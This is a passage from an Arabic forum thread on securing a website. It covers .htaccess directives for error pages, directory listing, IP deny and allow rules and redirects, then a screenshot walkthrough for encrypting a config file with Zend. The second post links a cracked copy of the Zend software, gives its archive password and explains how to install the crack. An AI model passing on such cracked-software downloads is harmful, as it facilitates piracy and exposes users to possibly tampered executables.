    403, access forbidden دخول غير مسموح أو منطقة محظورة .
    404, document not found الصفحةالتي طلبتها غير موجودة في الموقع ( الأكثر شيوعا)
    500, internal server error خلل في السيرفر ناتج عن ملف أو برنامج .
    يوجد مرفق لنموذج الملف إذا أردت تحميله



    ثانيا : وقف صفحة الفهرس
    لو أردت وقف استعراض محتويات مجلد معين بدل من إنشاء فهرس وهمي في كل مجلد تملكه فقط ضع الأمر

    كود PHP:
    Options -Indexes

    و أي مجلد لا يحتوي على فهرس يحاول أي شخص دخوله سيظهر له دخول غير مسموح ..

    ثالثا : منع أصحاب رقم الأي بي المعين من الدخول
    أحيانا قد تريد منع أصحاب رقم أي بي معين من الدخول لموقعك أو السماح فقط لمستخدمي مزود خدمة معين من الدخول لموقعك .بالطبع أن تحتاج لمعرفة رقم الابي بي .

    للمنع

    كود PHP:
    deny from 000.000.000.000

    للسماح

    كود PHP:
    allow from 000.000.000.000

    رابعا : منع الجميع من الدخول لمجلد معين .

    كود PHP:
    deny from all

    هذا لا يمسح بالدخول للمجلد لكن يسمح السكريبت او للبرنامج من استدعاء الملفات .

    خامسا: إعادة التوجيه
    هي طريقة رائعة عند طلب الزائر لصفحة معينه يتم تحويله إلى صفحة أخرى مفيد جدا إذا أعدت تنظيم موقعك مثلا . كما يمكن تحويل الزائر من موقعك إلى موقع آخر أو عنوان آخر .

    كود PHP:
    Redirect /oldfolder/test.html http://site.com/newfile.htm

    الصفحة التي سيطلبها الزائر هي olderfolder/test.html إلى العنوان التالي newfile.htm

    كما يمكنك التحويل لمجلد كامل مثلا في التصميم القديم لموقعنا كان هناك مجلد اسمه psp يحتوي على دروس بينت شوب برو وبعد إعادة تصميم موقعنا اصبح العنوان
    http://arabkit.com/cat/9

    لكن هناك الكثير من المواقع أو الموضوعات الخارجية التي مازالت تشير للمجلد القديم و لا يمكننا حصر جميع أسماء الملفات القديمة فيمكننا تحويل المجلد كاملا إلى العنوان الجديد

    كود PHP:
    Redirect /psp http://arabkit.com/cat/9

    انتهت الفكرة

  9. #9
    أدارى
    الصورة الرمزية HVIPS4


    تاريخ التسجيل: Jun 2011
    رقم العضوية: 6
    الدولة: Cairo
    المشاركات: 1,979
    HVIPS4 غير متواجد حالياً

    رد: شرح حماية المنتدى والسيرفر مقدمة من Hvips.net


    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    شرح كامل بالصور لتشفير ملف الكونفيج
    مع برنامج الزند وطريقة استخدامه


    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    السلام عليكم ورحمة الله وبركاته

    يجب عليك اولاً تنزيل البرنامج وتثبته على جهازك تثبيت عادي
    زي اي برنامج تابع معي شرح التثبيت للبرنامج مع طريقة تثبيت الكراك
    وهو كامل بكراكه
    وانا حملت لكم تفضلوا

    http://www.r4444r.com/abc/cp/Zend.zip

    باسورد فك الضغط

    رمز PHP:
    www.r4444r.com

    شرح التثبيت كالتالي

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    تابع شرحي بالصور

    ملف مرفق 418

    ملف مرفق 419

    ملف مرفق 420

    ملف مرفق 421


    تابع يا بعدي
    حيث ان الرقم واحد هو ملف برنامج الزند الي بداخله الكراك
    الرقم اثنين يعني موافق
    اضغط اللحين على الرقم ثلاثه

    ملف مرفق 424

    ملف مرفق 425

    اللحين في الأخير بتجيك صورة اضغط على كلمة
    Finish
    ومبروك تنزيل البرنامج
    اللحين بنبداء بشرح طريقة التشفير

    ملف مرفق 427

    ملف مرفق 428

    ملف مرفق 429

    ملف مرفق 430

    ملف مرفق 431



    رقم واحد طلع لنا اسم الكونفيج
    رقم اثنين تضغط عليه وتختار المكان اللي تبي تحفظ فيه الكونفيج بعد التشفير
    رقم ثلاثه غير هامة كثير
    رقم اربعة البدء في التشفير

    شوفوا الصورة الأخيره لو طلع لك نفس الكلام اللي في الصورة معناته الف مبروك عليك التشفير

    ملف مرفق 433



    وفي الملف المرفق هدية مني لكم كونفيج مشفر ارفعه على منتداك ولكن ضروري

    تسوي كونفيج ثاني ويكون وهمي زي شروحاتي اللي فوق


    وإلى هنا وصلنا إلى نهاية الشرح واتمنى ان يكون قد نال على رضاكم وإعجابكم



    شرح الحمايه بالتفصيل
    شرح الحمايه بالتفصيل

 

ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •